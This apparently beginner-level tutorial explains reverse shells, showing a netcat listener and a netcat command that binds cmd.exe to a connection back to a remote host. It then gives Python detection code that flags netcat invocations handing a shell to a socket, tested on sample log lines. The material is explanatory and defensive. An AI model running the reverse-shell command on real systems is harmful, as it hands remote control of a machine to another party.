Glimpse of Reverse Shell

A reverse shell is a connection that originates from the victim machine to the attacker's machine as a result of a malware infection or the exploitation of a vulnerability.

But you can get a glimpse of how a reverse shell works without exploiting or infecting a machine, using a simple netcat command. Here is how it works.

First, run the following command on the remote system. The -l option puts netcat in listening mode.

nc -l -p <port to listen on>

Then run this command on the victim machine. The -e option binds the standard input and output of a cmd.exe instance to the netcat socket that is about to establish a connection to the remote machine.

nc <remote ip> <remote port> -e cmd.exe

Et voilà! You get a remote shell: you can type commands and get the results on the other end.

Malware and exploits do more or less the same thing, but in a stealthy way. I hope this helps you, as a beginner, understand how a reverse shell works.
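
Seen from the defender's side, both commands above leave recognisable command lines in process-creation logs. The following is an added example, not part of the original post: it classifies logged netcat invocations and flags the ones that hand a shell to the socket with -e. The log lines, the function names and the handling of ncat's --exec and of clustered flags such as -lvp are assumptions that go beyond the two commands shown here.

```python
import re

NETCAT = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
SHELLS = {"cmd", "cmd.exe", "powershell.exe", "sh", "bash"}
TAKES_VALUE = set("pews")  # short options that consume the next argument

def _base(path):
    # Reduce a Windows or POSIX path to its lower-case file name.
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(cmdline):
    """Classify one logged command line; None means it is not netcat."""
    # Split on whitespace but keep "quoted paths" whole, then drop the quotes.
    argv = [a.strip('"') for a in re.findall(r'"[^"]*"|\S+', cmdline)]
    if not argv or _base(argv[0]) not in NETCAT:
        return None
    listen, port, prog, rest = False, None, None, []
    i = 1
    while i < len(argv):
        arg = argv[i]
        nxt = argv[i + 1] if i + 1 < len(argv) else None
        i += 1
        if arg == "--exec" and nxt is not None:  # ncat long form of -e
            prog = nxt
            i += 1
        elif arg.startswith("-") and not arg.startswith("--"):
            flags = arg[1:]  # also covers clusters such as -lvp
            listen = listen or "l" in flags
            if flags[-1:] in TAKES_VALUE and nxt is not None:
                i += 1
                port = nxt if flags[-1] == "p" else port
                prog = nxt if flags[-1] == "e" else prog
        else:
            rest.append(arg)  # positional arguments: host, then port
    shell = prog is not None and _base(prog) in SHELLS
    mode = "listening" if listen else "outbound"
    verdict = f"shell-exec-{mode}" if shell else ("listener" if listen else "netcat-other")
    if port is None and not listen and len(rest) > 1:
        port = rest[1]
    host = rest[0] if rest and not listen else None
    return {"verdict": verdict, "host": host, "port": port, "program": prog}

# Constructed process-creation records; 192.0.2.0/24 is a documentation range.
SAMPLE = [r'nc 192.0.2.10 4444 -e cmd.exe', r'"C:\Tools\nc.exe" -l -p 4444',
          r'nc -w 3 192.0.2.20 80', r'notepad.exe report.txt']

def alerts(lines):
    found = ((line, classify(line)) for line in lines)
    return [(l, f) for l, f in found if f and f["verdict"].startswith("shell-exec")]
```

Matching on the command line only catches netcat run under its usual names, so in practice it is paired with a check for cmd.exe whose standard handles are a network socket or whose parent is an unexpected process.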